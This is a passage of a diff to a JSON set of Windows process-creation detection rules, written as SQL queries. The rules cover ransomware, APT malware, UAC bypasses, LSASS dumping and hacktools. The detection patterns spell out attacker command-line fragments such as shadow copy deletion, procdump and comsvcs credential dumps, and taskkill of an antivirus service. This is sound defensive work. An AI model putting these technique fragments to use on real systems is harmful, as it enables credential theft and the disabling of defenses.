LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" - ], - "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" - }, - { - "title": "Tasks Folder Evasion", - "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", - "status": "test", - "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", - "author": "Sreeman", - "tags": [ - "attack.defense_evasion", - "attack.persistence", "attack.execution", - "attack.t1574.002" + "attack.t1204.002", + "attack.t1047", + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND Image LIKE '%.tmp' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_task_folder_evasion.yml" + "filename": "proc_creation_win_malware_maze_ransomware.yml" }, { - "title": "Sofacy Trojan Loader Activity", - "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", - "status": "test", - "description": "Detects Trojan loader activity as used by APT28", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "LockerGoga Ransomware Activity", + "id": "74db3488-fd28-480a-95aa-b7af626de068", + "status": "stable", + "description": "Detects LockerGoga ransomware activity via specific command line.", + "author": "Vasiliy Burov, oscd.community", "tags": [ - "attack.g0007", - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "car.2013-10-002", - "attack.t1218.011" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_sofacy.yml" + "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" }, { - "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", - "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", + "title": "Kavremover Dropped Binary LOLBIN Usage", + "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", "status": "experimental", - "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" - }, - { - "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", - "id": "ebef4391-1a81-4761-a40a-1db446c0e625", - "status": "test", - "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", - "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.003" - ], - "falsepositives": [ - "Legitimate software creating script event consumers" + "attack.defense_evasion", + "attack.t1127" ], - "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" + "filename": "proc_creation_win_lolbin_kavremover.yml" }, { - "title": "Potential Ke3chang/TidePool Malware Activity", - "id": "7b544661-69fc-419f-9a59-82ccc328f205", - "status": "test", - "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", - "author": "Markus Neis, Swisscom", + "title": "Taskkill Symantec Endpoint Protection", + "id": "4a6713f6-3331-11ed-a261-0242ac120002", + "status": "experimental", + "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", + "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", "tags": [ - "attack.g0004", "attack.defense_evasion", "attack.t1562.001" ], @@ -10299,73 +9981,28 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" + "filename": "proc_creation_win_taskkill_sep.yml" }, { - "title": "Potential NTLM Coercion Via Certutil.EXE", - "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", + "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", + "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", "status": "experimental", - "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", + "description": "Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_certutil_ntlm_coercion.yml" - }, - { - "title": "HackTool - DInjector PowerShell Cradle Execution", - "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", - "status": "test", - "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1055" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_hktl_dinjector.yml" - }, - { - "title": "OilRig APT Activity", - "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", - "status": "test", - "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_oilrig_mar18.yml" + "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" }, { "title": "Potential SMB Relay Attack Tool Execution", @@ -10386,26 +10023,6 @@ ], "filename": "proc_creation_win_hktl_relay_attacks_tools.yml" }, - { - "title": "UAC Bypass WSReset", - "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", - "status": "test", - "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" - ], - "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" - }, { "title": "HackTool - winPEAS Execution", "id": "98b53e78-ebaf-46f8-be06-421aafd176d9", @@ -10428,43 +10045,63 @@ "filename": "proc_creation_win_hktl_winpeas.yml" }, { - "title": "Delete All Scheduled Tasks", - "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "title": "Exploiting CVE-2019-1388", + "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", + "status": "stable", + "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_exploit_cve_2019_1388.yml" + }, + { + "title": "HackTool - KrbRelay Execution", + "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", "status": "experimental", - "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of KrbRelay, a Kerberos relaying tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_delete_all.yml" + "filename": "proc_creation_win_hktl_krbrelay.yml" }, { - "title": "Hermetic Wiper TG Process Patterns", - "id": "2f974656-6d83-4059-bbdf-68ac5403422f", + "title": "Suspicious Binary In User Directory Spawned From Office Application", + "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", "status": "experimental", - "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", + "author": "Jason Lynch", "tags": [ "attack.execution", - "attack.lateral_movement", - "attack.t1021.001" + "attack.t1204.002", + "attack.g0046", + "car.2013-05-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND Image LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" + "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" }, { "title": "Fireball Archer Install", @@ -10487,241 +10124,222 @@ "filename": "proc_creation_win_malware_fireball.yml" }, { - "title": "Exploited CVE-2020-10189 Zoho ManageEngine", - "id": "846b866e-2a57-46ee-8e16-85fa92759be7", - "status": "test", - "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", - "author": "Florian Roth (Nextron Systems)", + "title": "Abused Debug Privilege by Arbitrary Parent Processes", + "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "status": "test", + "description": "Detection of unusual child processes by different system processes", + "author": "Semanur Guneysu @semanurtg, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.s0190", - "cve.2020.10189" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2020_10189.yml" + "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" }, { - "title": "Potential LSASS Process Dump Via Procdump", - "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "title": "Winnti Pipemon Characteristics", + "id": "73d70463-75c9-4258-92c6-17500fe972f2", "status": "stable", - "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.credential_access", - "attack.t1003.001", - "car.2013-05-009" + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Unlikely, because no one should dump an lsass process memory", - "Another tool that uses the command line switches of Procdump" + "Legitimate setups that use similar flags" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" + "filename": "proc_creation_win_apt_winnti_pipemon.yml" }, { - "title": "Execution via Diskshadow.exe", - "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", - "status": "test", - "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", - "author": "Ivan Dyachkov, oscd.community", + "title": "PUA - Chisel Tunneling Tool Execution", + "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", + "status": "experimental", + "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ - "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." + "Some false positives may occur with other tools with similar commandlines" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_diskshadow.yml" + "filename": "proc_creation_win_pua_chisel.yml" }, { - "title": "ZOHO Dctask64 Process Injection", - "id": "6345b048-8441-43a7-9bed-541133633d7a", - "status": "test", - "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "title": "Cmd.EXE Missing Space Characters Execution Anomaly", + "id": "a16980c2-0c56-4de0-9a79-17971979efdd", + "status": "experimental", + "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" ], - "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" + "filename": "proc_creation_win_cmd_no_space_execution.yml" }, { - "title": "UAC Bypass Using ChangePK and SLUI", - "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", + "title": "Bypass UAC via Fodhelper.exe", + "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", "status": "test", - "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", "attack.t1548.002" ], "falsepositives": [ - "Unknown" + "Legitimate use of fodhelper.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" + "filename": "proc_creation_win_uac_bypass_fodhelper.yml" }, { - "title": "Potential Emotet Activity", - "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", - "status": "stable", - "description": "Detects all Emotet like process executions that are not covered by the more generic rules", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Raspberry Robin Dot Ending File", + "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", + "status": "experimental", + "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE 